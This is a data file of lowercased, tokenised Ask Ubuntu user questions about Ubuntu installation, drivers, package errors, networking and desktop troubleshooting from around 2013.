298219	how to parse watch command output to last 5 digits ?	from the command watch -n1 `` ifconfig eth0 | grep gib '' . i have output given below , now i just want the last 5 digits before ( gib ) . i wrote an regex for it , and it seems to work ( \d { 1,4 } ) ( ? ! . *\d ) \sgib the only problem is that i can not use it with the command i showed above ? i 'm using ubuntu any help
298223	can i set a specific group|umask to be the default one for all actions within a certain path ?	i would like to override the default umask and owner : group settings within certain directories only , without requiring root privileges , as that kind of defeats the purpose . for example , when i touch a file in /var/www/ it becomes 0755 and owned by redsandro : redsandro . i would like this to default to 0770 and redsandro : www-data for everything within /var/www/ . maybe there 's a better solution for this specific scenario . this seemed to be the only way to have both my non-root user and the webserver in full control over /var/www/ . as the only user of this machine , i like the htdocs to be 'mine ' without being root . apache becomes fed up though when you take too much territory inside htdocs . here is a related question for the umask part where the answer is `` no '' . but i am sure others have sought the same functionality , and i can imagine pwd based umask is available somehow just like git uses .git to store pwd independent settings that go up the directory-tree . or down , i 'm not sure if you call subdirectories up or down the tree . ; )
298225	rhytmbox alternative for built-in tags	i have tracks in formats that either not supported for tagging in rhytmbox or do n't have any tagging support at all and i want to scrobble them , which , naturally , requires at least artist and track name . is there a way to `` tag locally '' in rhytmbox 's playlist independently of actual physical format , so it will keep information , display it and report it to scrobbling and other plugins ?
298232	ubuntu tty1 - 6 blank screen	i can not access ubuntu console by pressing ctrl+alt+f1 - f6 . it only shows blank screen ( black ) . i do n't know since when , just found out recently . i suspect that fglrx driver is the problem ( ati radeon ) . i have n't tried to remove the fglrx driver ( because i do n't know how and i need it for graphic acceleration ) . any ide how to fix this ?
298233	logon failed ubuntu 13.04	i have a problem with my ubuntu 13.04 . i installed it beside windows 8 using the wubi-installer . i installed ubuntu on another partition of my primary hard disk as windows 8 . when i boot in ubuntu , i have to give a username and a password but the machine keeps saying that it is the wrong password . even when i gave 'pppp ' as a password during the installation i 'm not able to logon to my ubuntu machine . can somebody please help me ? regards
298237	how to install precise pangolin as a second os on a pc with a raid ?	i want to install ubuntu as a second operating system beside windows xp sp3 . my main pc has a mainboard based on the nvidia nforce4 architecture with an onboard ( mainboard ) nvidia raid controller , 4 disks in a 0+1 configuration . is it possible to install on this beast with a normal cd ? will the installer work fine with such hardware ?
298238	media player for ubuntu	is there a media player for ubuntu which will reliably play a music cd from start to finish ? i have tried for the last 3 months to get rhythmbox to run without success . it freezes dafter the first song or two .
298239	'sudo ' command is broken	i updated an old centrino-notebook after ubuntu 9.10 with 12.04 - now sudo seem to be broken , because after sudo < whatever > i get the error message : sudo : unable to initialize pam : no such file or directory in /var/log there seem to be no pam*.log file any more . i can not use sudo command for to change permissions of /etc files .
298244	can i add a 13.04 repo to 12.04 lts to install new package via synaptic ?	i want to install julia ( programming language from mit ) on ubuntu 12.04 lts , but i encountered some problems with the compilation from source . i noticed that there is a specific package to install it on 13.04 via aptitude . can i add the corresponding repo in 12.04 without creating conflicts ?
298247	how do i enable compiz widget layer onto ubuntu 13.04 ?	i installed the compiz package but when i added widgets via screenlets there was no layer . i want a layer so it would look like the mac version . how do i do this ? i have looked into the setting but could not find it , it might be there but i could not find it .
298249	recommended testing tools to test mysql performance ?	what is the recommended tool ( s ) for testing the performance of mysql 5.5 ( innodb ) under ubuntu 12.04 ? we have purchased a new multi-cpu multi-core server to replace our current mysql dual-core server . however , the mysql performance is worse than our current server ! we know we need to tweak the innodb parameters but it would be helpful if there is a tool out there that would test and make recommendations .
298250	how can i run a software package i installed called 'openscam ' ?	i installed a software called 'openscam ' but i can not find its launcher . it 's installer is a .deb file , after i clicked in it , ubuntu software center installed the software , and finished it , but i can not find its launcher . i tried to reinstall it , the same problem . i tried to install it from terminal , but it says , `` openscam is aldready the newest version '' . i installed all package dependencies . i searched the launcher in /usr/bin and /usr/share/applications but i did n't find anything . i 'm using 12.04 lts . software 's site is http : //openscam.com/ please help if you can !
298252	ubuntu one in lubuntu and xubuntu	i have an old computer running ubuntu 13.04 and want to speed it up by using lubuntu or xubuntu . will ubuntu one work on these ?
298268	streaming wine audio to twitch	i 'm trying to steam some dota 2 ( via wine ) casts to twitch using this shell script i found online : # ! /bin/bash stream_key= '' ( redacted ) '' fps= '' 30 '' inres= '' 1600x900 '' outres= '' 1280x720 '' qual= '' medium '' avconv \ -f x11grab -s $ inres -r `` $ fps '' -i :0.0 \ -f alsa -ac 2 -i pulse \ -vcodec libx264 -s $ outres -preset $ qual \ -acodec libmp3lame -ar 44100 -threads 6 -qscale 3 -b 712000 -bufsize 512k \ -f flv `` rtmp : //live.justin.tv/app/ $ stream_key '' it streams the video fine , but i only get audio from my plugged in microphone and no audio from dota 2 . this would n't be terrible if i only cared about getting the sound effects , but i am sometimes co-casting with other people using the built-in voice chat , and since i am not getting any of their audio , it sounds like i am a madman . i could try and use an external program for voice chat , but i do n't really want to force any of my random co-casters to set it up on their end . so i 'd like to be able to pipe both the wine audio and my microphone audio to the stream .
298273	how can i see the juju-core debug-log without tailing it ?	i wanted to watch my env get deployed using the debug-log command juju debug-log but i forgot , so now my env is deployed so tailing the log is useless . where can i find the full log ?
298276	ubuntu gnome 64- or 32-bit with i7 ?	so i 'm sure my pc is 64 bit , but while downloading ubuntu gnome , i encountered this : pc ( intel x86 ) desktop image for almost all pcs . this includes most machines with intel/amd/etc type processors and almost all computers that run microsoft windows , as well as newer apple macintosh systems based on intel processors . choose this if you are at all unsure . 64-bit pc ( amd64 ) desktop image choose this to take full advantage of computers based on the amd64 or em64t architecture ( e.g. , athlon64 , opteron , em64t xeon , core 2 ) . if you have a non-64-bit processor made by amd , or if you need full support for 32-bit code , use the intel x86 images instead . so yeah , it says that 64 bit is for amd , so with my i7 , should i pick 32 bit then ? greets , and thanks for the answer !
298277	architecture-independent performance monitor tool	i got to know `` perf '' tool in `` linux-tools-3.2.0-43 '' for ubuntu 12.04 which can monitor the performance counts for some micro-architectures , however , the tool is dependent to the cpu architecture and compiler . as i am interested in profiling the compiler transformations ( mostly with llvm ) , does anybody know any other profiling tools acting independently on the feature of the source code ( like cfg , skeleton , etc. ) ? edited : in addition , i have tried to use perf in vm ( monolithic ) , but it seems to be not monitoring kernel micro-architectures . is it generally possible ?
298282	how can i install and run a medical app designed for windows server 2008 in ubuntu ?	i 'm currently trying to install a windows server based app that works along with oracle database . this application normally installs folders ( as any other ) in the root of the system and it 's executed in a web browser . how can i install and execute this app ? perhaps using wine ? any recommendation or alternatives ?
298290	smbus/ bios error while booting ubuntu 13.04 in virtualbox	i am trying to boot ubuntu 13.04 in virtualbox , but every time i boot , i get an error that says `` smbus base address uninitialized - upgrade bios or use force_addr=0xaddr '' . this happens right after i start the virtual machine , and the operating system does not even start properly . i see the error , then the screen just goes black and gives me a blinking cursor . the solutions i have found online tell me to open up a terminal only after the os boots correctly . sadly , i can not even get to that stage , so i ca n't use that solution . help ? by the way , i am very new to virtual box and creating virtual machines , so excuse me if i 'm not familiar with some of the terminology . another thing , if it helps , is that i 'm running windows 7 as my host os . thank you !
298292	what 's the command to install the build-essential package ?	what 's the command on 32-bit ubuntu 12.04 for installing the build-essential package and linux headers generic package ?
298293	how to use ubuntu app developer 's key system ?	okay so i made a package and submitted it to ubuntu app developer . it does not install any files directly , but does depend on qt framework . the license key system ubuntu provides says it will look for it in the specified file . how do i use this system . how do i install a file to that place ? what file do i install ?
298295	why ubuntu 10.10 does not give any update ?	i have installed ubuntu 10.10 desktop i386 . whenever i am trying to update it from ubuntu update manager it shows your system is up-to-date . your ubuntu release is not supported anymore . but my system is not up to date . how can i recover from this problem ?
298303	ubuntu unable to detect 'realtek rtl8188ce wireless '	i 'm trying the 64bit ubuntu 12.04 on my new laptop to see if i 'd like to get rid of windows 8 . the problem is that it 's not detecting my wireless . it works in windows 8 , but wo n't work in ubuntu.. i opened the terminal and typed in : iwconfig i get the msg : lo no wireless extensions . i typed : sudo rfkill list all which did n't give any response . then i typed : sudo lshw -c network as advised in some forums . still , it 's not detecting the wireless . anyone have any ideas ?
298309	any alternative of 'camtasia studio ( screen recording & video editing ) ' for ubuntu ?	i want to make a video tutorials in ubuntu . is there a similar program to camtasia studio ( screen recording & video editing software ) in windows ?
298310	random lagg spikes .	when i play games or watch a video the computer freezes in every 5 minits for 10 second . i use xfce and i have the nvidia driver .
298321	ca n't download gnome 3 for ubuntu 12.10	how can i install gnome 3 on ubuntu 12.10 ? i tried to apt-get install gnome-panel , but it errors out because of unmet dependencies , even if i pass -f : kanha @ kanha-aspire-5580 : ~ $ sudo apt-get -f install gnome-panel reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gnome-panel : depends : libpanel-applet-4-0 ( > = 3.4.1 ) but it is not going to be installed depends : gnome-panel-data ( = 1:3.6.0-0ubuntu2 ) but it is not going to be installed recommends : gnome-applets but it is not going to be installed recommends : gnome-session-fallback but it is not going to be installed recommends : indicator-applet-complete but it is not going to be installed google-chrome-stable : depends : libgconf2-4 ( > = 2.27.0 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
298328	i have upgraded from ubuntu 12.10 to 13.04 and have no taskbar	i upgraded my ubuntu 12.10 to 13.04 last night , dell 64bit pc , using the software/update manager . the upgrade took a long time , but did not seem to have any problems . when i rebooted into ubuntu 13.04 , i had no taskbar to my left anymore therefore no terminal . my menu bar at the top is also missing . what do you think happened and how can i fix this ?
298329	why does aircrack-ng 1.1 in ubuntu 13.04 stop my graphic card from working ?	when i use airmon-ng in the terminal , my graphic card stops working properly and a fuzzy screen appears , making me go for a hard reboot . i use v. 1.1 of aircrack-ng in ubuntu 13.04 .
298333	am i using upstart correctly ?	i 'm trying to write a startup script for my ubuntu 12.04 desktop that pings my netgear router every 30 seconds ( this is necessary as a nasty workaround for a separate problem i 'm having ) . i read this tutorial here , and it seems that i could accomplish this with a simple keep-alive.conf script : script ping -i 30 192.168.1.1 end script if that 's correct , then i assume i just need to save this script to /etc/init.d/keep-alive.conf ? i 'm also not seeing how i tie the execution of this script to a `` startup '' event ... thanks in advance for help on placing the script , and connecting to startup events !
298334	unable to locate package update-manager-core	following the guide i found here i am trying to upgrade my ubuntu version from 10.10 to 12.04 . as do-release-upgrade gave the error command not found i tried to install update-manager-core which results in this error root @ myserver : ~ # apt-get install update-manager-core reading package lists ... done building dependency tree ... done e : unable to locate package update-manager-core now i 'm stuck , as nobody else on the web seems to have that issue
298338	how do i install ubuntu with a usb on a dell that has no operating system ?	i 've been trying to look for this for a while , i only have access to one computer and that is my school computer that has blocks on using a lot of programs thank god i can download ubuntu . i 'm trying to install ubuntu onto my dell precision 470 workstation through a usb and so far i 'm getting no help searching on the internet . so my main question is can i put the .iso onto my usb and plug it into my dell and will it install ? would i have to go into my boot menu and change the priority to usb and after i do that then what ? i 'm a bit lost . edit : my school computer is a macbook air and since its a school computer most websites are blocked and i 'm not able to install any programs . so would i have to use another computer or am i able to use this one ?
298342	how do i get an sd card reader to work in ubuntu 13.04 ?	i 'm running ubuntu 13.04 on a clevo p151emx , it has a built-in realtek pcie cardreader 5289 , which works fine in windows , but refuses to show up in ubuntu . i ca n't see any sd cards i put in it in /dev , and lspci shows it as follows : 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) i 've tried the fix here : https : //bugs.launchpad.net/ubuntu/+source/udisks/+bug/971876 . but no luck . any suggestions ? p.s . i 'm trying to format a microsdhc card using fdisk for use in a beaglebone black , if that helps . someone asked for the output of lspci -v -s 03:00.0 : 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) subsystem : clevo/kapok computer device 5105 < br > flags : bus master , fast devsel , latency 0 , irq 43 < br > memory at f7a00000 ( 32-bit , non-prefetchable ) [ size=64k ] < br > capabilities : access denied < br > kernel driver in use : rtsx_pci the relevant entries in dmesg -t are : [ tue may 21 15:19:36 2013 ] mmc0 : error -110 whilst initialising sd card [ tue may 21 15:19:37 2013 ] mmc0 : error -110 whilst initialising sd card [ tue may 21 15:19:36 2013 ] mmc0 : error -110 whilst initialising sd card
298343	on ubuntu 12.04 is /etc/skel/ the correct place to put extra files for new users ?	on ubuntu 12.04 is /etc/skel/ the correct place to put extra files for new users ? in the linux administration handbook it mentions files from /usr/local/lib/skel which does n't seem like an ubuntu-esque path , nor does it exist on my fresh install of 12.04 server . i 'm just curious if there is anything like a conf.d directory for /etc/skel/ or a /usr/local/skel and where that would be in the documentation . i know you can specify which skeleton to use with the skel variable with adduser - just curious what the `` correct '' way to go about editing the skeletons is with this part of system administration is - if there is an agree 'd upon one .
298345	how do i see windows 8 files on ubuntu 12.10 ?	very new to ubuntu , and i think the interface is absolutely beautiful . i am using ubuntu through the usb for now , after following this tutorial http : //lifehacker.com/5504531/the-co ... -a-thumb-drive - i have version 12.10 ubuntu . 1 ) my windows 8 imploded on me , it went from an automatic repair loop to constantly asking for repair and restarting itself . sadly , none of the tools they provide have any effect , and this laptop is only a few weeks old . i booted ubuntu to try to get a file ( literally one note document that i forgot to backup , and my exams are in a few days ! great timing ^ ^ ) , the problem is i can only see some of the files under `` windows 8 os -- > documents '' , i already have hidden items being shown , and tried ctrl+h . other posts have said to ctrl+l host or /media/user , but neither of these work . thank you !
298352	ubuntu taskbar 12.04	in ubuntu 10.04 , i had the taskbar ( applications , places and system ) . i could easily navigate to anything ... now in ubuntu 12.04 , i no longer have the taskbar . yes , i have the search feature , but i really do not like that . how do i get it back ?
298359	how to make ubuntu one app synchronize outwards only ( only remote be updated ) ( one directional ) ?	is there some way to make ubuntu one synchronize only outwardly ( from local to remote only ) ? so , when i make a change on my local file , it be updated remotely on ubuntu one . but if the file is changed remotely or deleted , it is not synchronized on my local machine , and instead of that , the remote is updated again with my local copy . i think this can be called one-directional synchronization .
298360	how to refresh an icon that has been changed so the new one shows up ?	i want to customize two icons in the top right indicator of the unity-panel , the one for everpad and the one for deluge . i found this solution : how do i merge two icon sets ? ... and love it , it 's much better than how i usually try this icon things out . having my own ~./icons/my-theme with an index.theme and some symlinks to some custom icons , as well as the `` my-theme '' icon theme selected ( thanks to ubuntu-tweak ) , gives me what i want , and everything is working fine , but the problem is that ... ... when i edit one of my custom icons , for example , if i change the color , the icon in unity-panel does n't change . i have tried to use `` gtk-update-cache '' on `` ~/.icons/my-theme '' , but that must not be the way it has to be done to refresh the icons . and i know those are the icons i added ... so , can someone point me to the right direction as to how to refresh the icons that show up in this not-so-common circumstances ? thanks in advance . and my own big yeah ! ! to pydave for that answer i just linked , i 'd upvote it if i could .
298361	kate sql plugin missing mysql	i installed the kate sql plugin , but there are no options in the dropdown for oracle or mysql . the only option is something called qsqlite . does anyone know how to get mysql and oracle to work with this tool ?
298365	package repository for arm32	is there a repository of .deb packages for 32-bit arm architecture . i 'm having issues compiling several gnome packages and i 'd rather acquire the binaries directly .
298367	maas node : automatic discovery - get [ ] list ?	adding nodes to the system . we tried the automatic discovery method . the command that we typed in `` maas-cli maas nodes accept-all '' however , the output is [ ] . does this mean that it does n't recognize nodes ? enlist nodes via ubuntu server installation cd , and we observe that our server name appeared on enlisting with the maas server . i believe this indicates that the node can communicate the maas server . however , we believe that maas server ca n't due to above observation ( i.e [ ] ) . please verify whether our understanding is right or wrong , and also elaborate what to do to make the server accept all nodes . note that our goal is to make the node state to change from `` commissioning '' to `` ready '' state . we clearly did checked that clocks were synchronized . thank you
298368	how to fix `` could not connect to kernel driver . '' hostapd error ?	hi everyone i have a problem when i try to start hostapd when i enter this command hostapd hostapd-minimal.conf i got this configuration file : hostapd-minimal.conf could not set channel for kernel driver wlan0 : unable to setup interface . could not connect to kernel driver . i have intel corporation centrino wireless-n 1000 this is my config file : interface=wlan0 driver=nl80211 ssid=test hw_mode=g channel=1 macaddr_acl=00:1e:64:1f:1e:6a
298371	how do i enable the broadcom sta propriatory driver	i am unable to use wireless connections . i tried using a wired connection and got like thirty minutes into the installation then it failed and now when i try to install the drivers again it disconnects and reconnects to the internet causing a failure of download . i am pretty new to ubuntu but i understand a lot already . any and every solution would be great . the driver description is as follows : this package contains broadcom 802.11 linux sta wireless driver for use with broadcom 's bcm4311- , bcm4312- , bcm4313- , bcm4321- , bcm4322- , bcm43224- , and bcm43225- , bcm43227- and bcm43228-based hardware .
298373	need help dual-booting ubuntu 13.04 with windows 8	i have a laptop with windows 8 installed on it , it is the hp 2000 series . got it for christmas in 2012 . i inserted a cd with ubuntu 12.10 in it ( i got the cd before ubuntu 13.04 came out ) and it was confirmed on another pc it worked , right now i 'm downloading 13.04. and when i inserted the cd into this laptop , it did n't boot into ubuntu , it went to windows 8 ...
298375	installing nvidia driver causes black screen ( 750m )	i have a dual boot set up on a lenovo ideapad y500 with nvidia 750m and i am having problems installing the graphics cards . i have made sure to install both linux-headers-generic and linux-source , and yet have ended up with a black screen whether i install nvidia-current , nvidia-current-updates , nvidia-experimental-310 , and nvidia-319 . i even tried enabling proprietary drivers through settings and still ended up with a black screen on boot . is my graphics card just not supported yet , or is there a way to fix this ?
298376	cant install or uninstall anything after a failed sun-java-6 installation	i 've attempted to install sun-java-6 by following a method given in a site which asked me to add a repository and then sudo apt-get install sun-java6-jre . while installing on terminal i cant click anything to accept the license so i exited terminal . i restored the repository file to its default because when i try installing anything it automatically leading me to the sun-java6-jre installation and then the license agreement . now when i try to install anything i get the following error : e : the package sun-java6-jre needs to be reinstalled , but i ca n't find an archive for it . what should i do.. ? ? how can i fix this sun-java6 problem . even apt-get install -f is giving the above error . million thanks in advance : )
298380	how make virtualbox share virtual machine list in a dual boot system ( windows 7 and ubuntu ) ?	i want virtualbox on ubuntu display the vms i created while running virtualbox in windows 7 , i 'm working with a dual boot pc . windows 7 partition is accessible and writable from my ubuntu and i changed the default machine folder options of the ubuntu virtualbox to point to : /mnt/92fa7233fa721427/users/myusername/virtualbox vms and still not show the vms that are there . to show the vms created while i was logged in windows i must re-add them in ubuntu ( ctrl-a ) . maybe the vm list is stored in some configuration file , but i do n't know which one . where virtualbox store the list of vms ? what i must do to after i create a vm in windows it appear in ubuntu without have to re-add it ?
298382	ubuntu 12.04 ca n't see windows 7	i already read other questions like this but nothing seems to work . i just had my asus ux31a recovered from factory with windows 7 . everything is fine there , so i tried to reinstall ubuntu 12.04 lts ( the first time installation worked fine , so i was confident it would have worked this time as well ) . i shrik volume from my second windows partition to make it unallocated , boot the ubuntu live usb and when i try to install it tells me that there 's no other operating sistem to install ubuntu alongside . if i proceed with the manual operation to create the swap area and the os partition , it does n't make me choose whether it should be logical or principal , so i do n't dare to go on . if i look at gparted it does n't show the label os on c : , while on the disk manager in windows everything seems ok. what should i do ? i do not want to reinstall windows , any other clue ? thanks edit 1 i tried to launch os-prober in my terminal and the only option i get is /dev/sda5 : windows recovery environment ( loader ) : windows1 : chain while windows 7 ( mounted on dev/sda3 ) is not showed . this is what i see in my disk manager inside windows 7 : click for a full-resolution image . ( sorry for the italian language , c : basically is the partition with windows system 's file , while the d : one is for data ) , while this is what i see when i launch gparted : click for a full-resolution image .
298384	meld installation issue	i am trying to install the meld diff viewer on ubuntu 12.04 lts . when i run sudo apt-get install meld i get the following output : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libgtksourceview2.0-0 libgtksourceview2.0-common python-glade2 python-gnome2 python-gtksourceview2 python-pyorbit suggested packages : python-gtk2-doc python-gnome2-doc libgtksourceview2.0-dev python-pyorbit-dbg the following new packages will be installed : libgtksourceview2.0-0 libgtksourceview2.0-common meld python-glade2 python-gnome2 python-gtksourceview2 python-pyorbit 0 upgraded , 7 newly installed , 0 to remove and 57 not upgraded . need to get 0 b/1,048 kb of archives . after this operation , 5,255 kb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously unselected package libgtksourceview2.0-common . ( reading database ... 60 % dpkg : unrecoverable fatal error , aborting : reading files list for package 'python-aptdaemon.gtk3widgets ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 ) is there something wrong with the package libgtksourceview2.0-common ? is there a way to get a better update , or another way to get meld installed ? i am uncertain how to proceed ...
298387	archive manager started instead of executing a shell-script	when i double click on a .sh ( the file is executable ) file in nautilus the archive manager is started instead of executing the script . how can i make nautilus show the dialog ( execute/edit/ ... ) again ?
298388	ubuntu 13.04 indicator-datetime-service loads 100 % cpu	ubuntu 13.04 64bits desktop ( freshly downloaded from the site a couple of days ago ) indicator-datetime-service loads cpu up to 100 % ( 1-2 core ) and gnome-settings-daemon eats whole ram just after ubuntu loading . how to fix it ? there is a bug in dev forums but it is not clear for me how to fix it ( just applied a new update to the system - no way ) . deleting files from ~/.cache/ ; or reboot ; or login with 'gnome-fallback'- no help . even if i kill gnome-settings-daemon it may arise again later . note : i have a vnc4 server running on ubuntu and gnome-core ( gnome shell 3.6.3.1 ) . note : i removed ntpdate but no help . calendar on desktop is inactive for some time , network time is off .
298389	restart upstart	i 'm in the process of building a job to work in upstart , and any time i have even a typo the entire upstart breaks ; not just my job . is there any way to reload upstart without rebooting ?
298391	i 'm seeing `` rpcbind '' errors on 13.04_x64 startup	from my boot.log , i see this : rpcbind : can not open '/run/rpcbind/rpcbind.xdr ' file for reading , errno 2 ( no such file or directory ) rpcbind : can not open '/run/rpcbind/portmap.xdr ' file for reading , errno 2 ( no such file or directory ) i 'm running raring 13.04 both x86 and x64 ( two machines ) . both machines show these same two lines in boot.log and i 'm wondering how to fix it . one post i 've seen suggests opening /etc/init.d/rpcbind and adding if [ ! -f $ statedir/rpcbind.xdr ] then touch $ statedir/rpcbind.xdr fi if [ ! -f $ statedir/portmap.xdr ] then touch $ statedir/portmap.xdr fi but /etc/init.d/rpcbind is empty on both my machines , so i 'm not about to start mucking about , especially since this does n't seem to be affecting anything else as far as i can tell . it 's just a little annoying to see these errors fly by on boot .
298393	how use specific key combination ( shortcuts ) to change keyboard laungage ?	i have installed ubuntu 13.04 today . i have added 4 languages , but i do n't like standard way to switch them one by one . in windows i used key combinations ( shortcuts ) to switch to specific language ( shift+alt+1 for english , shift+alt+4 for german for example ) . how i can make same in ubuntu ? thank you for your answers !
298398	black screen after booting for the first time ( ubuntu 12.04 )	so i 've faced this really annoying issue that i ca n't seem to fix . so , i recently installed a ubuntu 12.04 and everything went smoothly as you would assume . i created 3 partitions ( swap , one for home and one for root ) . now , when it asked of me to restart i did and now every time i try to boot the screen goes black ( literally , the display does not active ) . so after few boots , it only activated the display , but it is black . i read somewhere that what causes it is incompatible graphics driver , and that it occurs with units that have nvidia or ati cards . however , i have intel graphics hd 3000 as my primary card and nvidia gt 525m as my secondary card . does anyone know how to fix this ? thanks in advance ,
298401	how do i get maximal compressed screenshots ?	i 'd like to compress my screenshots as much as possible before i send them via email . the best compression ratio i only got with some work on each screenshot : first i took the screenshot with shutter : 1920x1080px , png compression 9 - > around 450kb then i uploaded it to http : //tinypng.org/ - > got the same picture with quantisation but only around 150kb left how could i achieve such a good compression within a screenshot tool like shutter ? but shutter has no `` quantisation '' option . the quality is not that important , i would n't mind to have it more lossy . maybe with gif it would be possible to compress smaller ? or with less colors ? the technique of http : //tinypng.org seems fabulous : similar colours in your image are combined . this technique is called âquantisationâ . because the number of colours is reduced , 24-bit png files can be converted to much smaller 8-bit indexed colour images . all unnecessary metadata is stripped too . the result : tiny 8-bit png files
298403	firefox can not draw the new google maps	google released the new google maps . unfortunately , it does n't work on firefox 21.0 on ubuntu 13.04 . when i open the page , firefox just draws white grids on the screen . dragging or clicking the screen does not cause anything . however , when the screen is resized , firefox draws the current status of the map . i tried opening it on the safe mode , but the result was the same . does anybody know how to work it on firefox ? note that it works flawlessly on chrome . in addition , it also works on firefox on windows 8 , on the same machine . my machine 's graphics card is the following : $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v2/3rd gen core processor graphics controller ( rev 09 )
298404	deleting folders and files from a directory	how do you delete all folders and files in a directory and subdirectory ?
298411	is it possible to customize the gparted toolbar so that the icons include text ?	i installed gparted 0.12.1 in ubuntu . there is no text description under the toolbar icons . is there a way to display text under the icons in the toolbar as can be seen on the various tutorial web pages and the gparted page at wikipedia ?
298414	internet access only via vpn ( cisco anyconnect ) , when vpn off - dns look-up fails	i am using ubuntu 12.04 . after installing vpn client and using it for couple of months normally , something happened . after one more package/program update i stopped being able to connect to internet without the vpn client - ie i have to be connected through my university vpn even with my home wifi connection . on windows xp machine ( dual-boot on the same laptop ) and android phone everything works just fine .
298416	backup virtualbox windows 7	i 'm experiencing some problems with my current installation of ubuntu 13.04 . is there a way to back up my current virtualbox windows 7 vm so when i cleanly install ubuntu again i can just import the vm into virtualbox without having to reinstall it and all of its software ? thanks !
298419	how to disconnect from openvpn ?	i 'm connecting using vpnbook servers and it works fine with this command : sudo openvpn -- config /etc/openvpn/vpnbook-udp-53.ovpn -- auth-user-pass /etc/openvpn/password.txt but i just ca n't seem to figure out how to stop it without a reboot . i 've tried service openvpn stop and /etc/init.d/vpnbook stop , but that does n't seem to affect it .
298424	default package list	is it possible to find a place where the default package in ubuntu releases are ? by default , i mean all the packages installed when you install ubuntu .
298425	ethernet card does n't connect	i have tried multiple gigabit network cards , the latest st1000bt32 startech , and two different gigabit routers . the machine refuse to connect and pull an ip address . i 've tried different ethernet cords , different routers , different ethernet cards . i 've even tried a startech 10/100 st100s ... it just lights up and never makes a connection ... just says connecting and dies . then retries . i have also tried it on different ubuntu installs ... nothing works . cat /etc/network/interfaces auto lo iface lo inet loopback ifconfig eth0 link encap : ethernet hwaddr bc:5f : f4:57:8e:13 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth2 link encap : ethernet hwaddr 00:0a : cd:22:88:27 inet6 addr : fe80 : :20a : cdff : fe22:8827/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:26 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:5528 ( 5.5 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:90 errors:0 dropped:0 overruns:0 frame:0 tx packets:90 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:8661 ( 8.6 kb ) tx bytes:8661 ( 8.6 kb ) any ideas would be very appreciated !
298427	could multiple live wifi profiles coexist on ubuntu ?	at work there are couple wifi available for different purpose . my laptop can connect to any one of them if only one wifi was configured on ubuntu , i.e . only one wifi profile is valid at the time . however , if more than one were configured , ubuntu could not connect to any one of them . dmesg reported `` deauthenticating from 04 : c5 : a4:09:51:3d by local choice ( reason=3 ) '' or `` deauthenticating from 04 : c5 : a4:09:51:3d by local choice ( reason=2 ) '' laptop : hp folio 9470m ubuntu 13.04 kylin uname -a linux hp-elitebook-folio-9470m 3.8.0-19-generic # 29-ubuntu smp wed apr 17 18:16:28 utc 2013 x86_64 x86_64 x86_64 gnu/linux these wifi could be switched on windows 7 without any issue . it would be great if somebody could find out what is the problem and how to fix it on ubuntu .
298433	ubuntu flash drive will not boot	i created a bootable flash drive using windows 7 , pendrivelinux , and ubuntu-12.04.2-desktop-i386 . i tried booting from it after changing boot option in bios to usb . system shows no errors but boots in windows 7 . i went to disk managment and the drive does not show up as bootable . pendrivelinux completed showing no errors . what am i doing wrong ?
298437	can not find `` run ubuntu alongside with windows '' option when installing	i have windows 7 , and i 'm trying to dual boot windows 7 and ubuntu . however , when i try to install ubuntu with a usb , it does n't give me the option to dual boot . i can only `` replace windows 7 with ubuntu '' , or `` something else '' . i 've installed ubuntu on this computer before , and this option was present . what i 'm asking for is a way to get that option , or how to use the `` something else '' option .
298439	ubuntu 13.04 stuck during boot after grub	i just upgraded ubuntu from 12.10 to 13.04 today . everything went smooth until after reboot , and now at the grub menu . if i picked the first option ( which says ubuntu ) it goes to a blank screen with a lot of scrolling text and then simply stops on : [ 5.420120 cr2:0*82000 i 've read that many people have had a similar problem with fresh boot to 13.04 : ubuntu 13.04 wo n't boot after grub || upgrade to ubuntu 13.04 problem - boots into blank black screen i used these to get ubuntu backup and working by going to advance ubuntu options and booted into the first one . but , this is a workaround and not a fix those links offer more technical suggestions , but those are beyond my ability to comprehend . so my question is : how to fix the default ubuntu option in grub so that it does n't display the wall of scrolling text and freeze ?
298441	wacom bamboo mte-450 on 12.10 lts	i am new to ubuntu and i am trying to get my wacom tablet ( mte-450 ) working . i have seen other threads that refer to methods of installing drivers for cth or ctl models . is this method the same for my model ? i updated to 12.10 as suggested by another user , but still no luck . the tablet is still not recognized . any help would be greatly appreciated . thanks in advance , steve
